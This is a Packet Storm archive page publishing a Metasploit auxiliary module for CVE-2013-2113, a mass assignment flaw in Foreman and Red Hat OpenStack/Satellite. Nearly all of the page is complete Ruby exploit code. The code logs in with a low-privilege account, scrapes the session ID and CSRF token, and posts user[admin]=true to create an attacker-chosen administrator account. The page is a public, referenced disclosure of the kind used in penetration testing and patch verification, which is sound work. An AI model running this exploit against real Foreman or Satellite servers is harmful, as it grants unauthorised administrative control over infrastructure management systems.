the original cloud security

Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment

Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment
Posted Aug 21, 2013
Authored by Ramon de C Valle | Site metasploit.com

This Metasploit module exploits a mass assignment vulnerability in the create action of users controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator account. For this exploit to work, your account must have create_users permission (e.g., Manager role).

tags | exploit, arbitrary
systems | linux, redhat
advisories | CVE-2013-2113, OSVDB-94655
MD5 | 6b7d123975185a045bc7808f5ce92877

Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name' => 'Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment',
'Description' => %q{
This module exploits a mass assignment vulnerability in the 'create'
action of 'users' controller of Foreman and Red Hat OpenStack/Satellite
(Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator
account. For this exploit to work, your account must have 'create_users'
permission (e.g., Manager role).
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['BID', '60835'],
['CVE', '2013-2113'],
['CWE', '915'],
['OSVDB', '94655'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=966804'],
['URL', 'http://projects.theforeman.org/issues/2630']
],
'DisclosureDate' => 'Jun 6 2013'
)

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('NEWUSERNAME', [true, 'The username of the new admin account']),
OptString.new('NEWPASSWORD', [true, 'The password of the new admin account']),
OptString.new('NEWEMAIL', [true, 'The email of the new admin account']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end

def run
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'vars_post' => {
'login[login]' => datastore['USERNAME'],
'login[password]' => datastore['PASSWORD']
}
)

if res.nil?
print_error('No response from remote host')
return
end

if res.headers['Location'] =~ /users\/login$/
print_error('Authentication failed')
return
else
session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/

if session.nil?
print_error('Failed to retrieve the current session id')
return
end
end

print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri)
)

if res.nil?
print_error('No response from remote host')
return
end

if res.headers['Location'] =~ /users\/login$/
print_error('Failed to retrieve the CSRF token')
return
else
csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i

if csrf_param.nil? || csrf_token.nil?
csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
end

if csrf_param.nil? || csrf_token.nil?
print_error('Failed to retrieve the CSRF token')
return
end
end

print_status("Sending create-user request to #{target_url('users')}...")
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users'),
'vars_post' => {
csrf_param => csrf_token,
'user[admin]' => 'true',
'user[auth_source_id]' => '1',
'user[login]' => datastore['NEWUSERNAME'],
'user[mail]' => datastore['NEWEMAIL'],
'user[password]' => datastore['NEWPASSWORD'],
'user[password_confirmation]' => datastore['NEWPASSWORD']
}
)

if res.nil?
print_error('No response from remote host')
return
end

if res.headers['Location'] =~ /users$/
print_good('User created successfully')
else
print_error('Failed to create user')
end
end

def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close